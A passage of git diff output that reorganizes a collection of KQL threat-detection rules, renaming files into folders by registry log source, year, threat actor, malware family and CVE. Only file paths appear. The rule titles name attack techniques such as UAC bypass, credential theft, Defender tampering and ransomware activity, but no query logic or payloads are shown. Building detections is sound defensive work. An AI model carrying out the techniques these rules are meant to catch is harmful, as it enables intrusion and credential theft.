KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_scrobj_dll_com_hijacking.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_shim_database_in_uncommon_location.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_shim_database_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_typedpaths.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_visual_studio_tools_for_office.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_powershell_execution_policy_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_psfactorybuffer_com_hijacking.kql (100%) rename KQL/rules/{Impact => windows/registry/registry_set}/potential_ransomware_activity_using_legalnotice_message.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_registry_persistence_attempt_via_windows_telemetry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_sentinelone_shell_context_menu_scan_command_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_signing_bypass_via_windows_developer_features_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_werfault_reflectdebugger_registry_value_abuse.kql (100%) rename KQL/rules/{Execution => 
windows/registry/registry_set}/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potentially_suspicious_desktop_background_change_via_registry.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_set}/potentially_suspicious_odbc_driver_registered.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/powershell_as_a_service_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/powershell_logging_disabled_via_registry_key_tampering.kql (91%) rename KQL/rules/{Execution => windows/registry/registry_set}/powershell_script_execution_policy_enabled.kql (100%) rename KQL/rules/{Resource Development => windows/registry/registry_set}/pua_sysinternal_tool_execution_registry.kql (84%) rename KQL/rules/{Resource Development => windows/registry/registry_set}/pua_sysinternals_tools_execution_registry.kql (54%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/python_function_execution_security_warning_disabled_in_excel_registry.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/rdp_sensitive_settings_changed_to_zero.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/register_new_ifiltre_for_persistence.kql (100%) rename KQL/rules/{Impact => windows/registry/registry_set}/registry_disable_system_restore.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/registry_explorer_policy_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/registry_hide_function_from_user.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/registry_modification_to_hidden_file_extension.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/registry/registry_set}/registry_persistence_via_explorer_run_key.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/registry_persistence_via_service_in_safe_mode.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/restrictedadminmode_registry_value_tampering.kql (100%) rename KQL/rules/{Initial Access => windows/registry/registry_set}/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/scheduled_taskcache_change_by_uncommon_program.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/screensaver_registry_key_set.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/scripted_diagnostics_turn_off_check_enabled_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/security_event_logging_disabled_via_minint_registry_key_registry_set.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/service_binary_in_suspicious_folder.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/servicedll_hijack.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/session_manager_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_application_allowed_through_exploit_guard.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_environment_variable_has_been_registered.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql rename KQL/rules/{Resource Development => windows/registry/registry_set}/suspicious_keyboard_layout_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/registry/registry_set}/suspicious_powershell_in_registry_run_keys.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/suspicious_printer_driver_empty_manufacturer.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_service_installed.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/suspicious_shim_database_patching_activity.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/suspicious_space_characters_in_runmru_registry_path_clickfix.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/sysmon_driver_altitude_change.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/system_scripts_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/tamper_with_sophos_av_registry_keys.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/trust_access_disable_for_vbapplications.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_abusing_winsat_path_parsing_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_using_windows_media_player_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_via_event_viewer.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_via_sdclt.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/uac_disabled.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/uac_notification_disabled.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/uac_secure_desktop_prompt_disabled.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/registry/registry_set}/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/uncommon_microsoft_office_trusted_location_added.kql (100%) rename KQL/rules/{Resource Development => windows/registry/registry_set}/usage_of_renamed_sysinternals_tools_registryset.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/vbscript_payload_stored_in_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/wdigest_enable_uselogoncredential.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/wfp_filter_added_via_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/windows_defender_exclusions_added_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/windows_defender_service_disabled_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/windows_event_log_access_tampering_via_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_set}/windows_recall_feature_enabled_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/winget_admin_settings_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/winlogon_allowmultipletssessions_enable.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/winlogon_notify_key_logon_persistence.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/winsock2_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/wow6432node_classes_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/wow6432node_currentversion_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/registry/registry_set}/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql (100%)
diff --git a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql b/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/zxshell_malware.kql
rename to KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql
rename to KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql
diff --git a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql
rename to KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql
rename to KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql
diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql
rename to KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql
diff --git a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql
rename to KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql
diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql
rename to KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql
diff --git a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql
rename to KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql
diff --git a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql b/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/fireball_archer_install.kql
rename to KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql
rename to KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql b/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql
rename to KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql
diff --git a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql
rename to KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql
rename to KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql
rename to KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql
rename to KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql b/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql
rename to KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql
diff --git a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql
rename to KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql
rename to KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql
rename to KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql
rename to KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql rename to KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql diff --git a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql rename to KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql rename to KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql rename to KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql rename to KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql 
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql b/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql rename to KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql diff --git a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql rename to KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql rename to KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql diff --git a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql rename to KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql rename to KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql 
diff --git a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql rename to KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql diff --git a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql 
diff --git a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql b/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql rename to KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql diff --git a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql b/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql 
diff --git a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql rename to KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql rename to KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql diff --git a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql rename to KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql diff --git a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql rename to KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql 
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql rename to KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql rename to KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql diff --git a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql rename to KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql b/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql rename to KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql diff --git a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql 
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql diff --git a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql diff --git a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql 
diff --git a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql rename to KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql rename to KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql rename to KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql similarity index 100% rename from 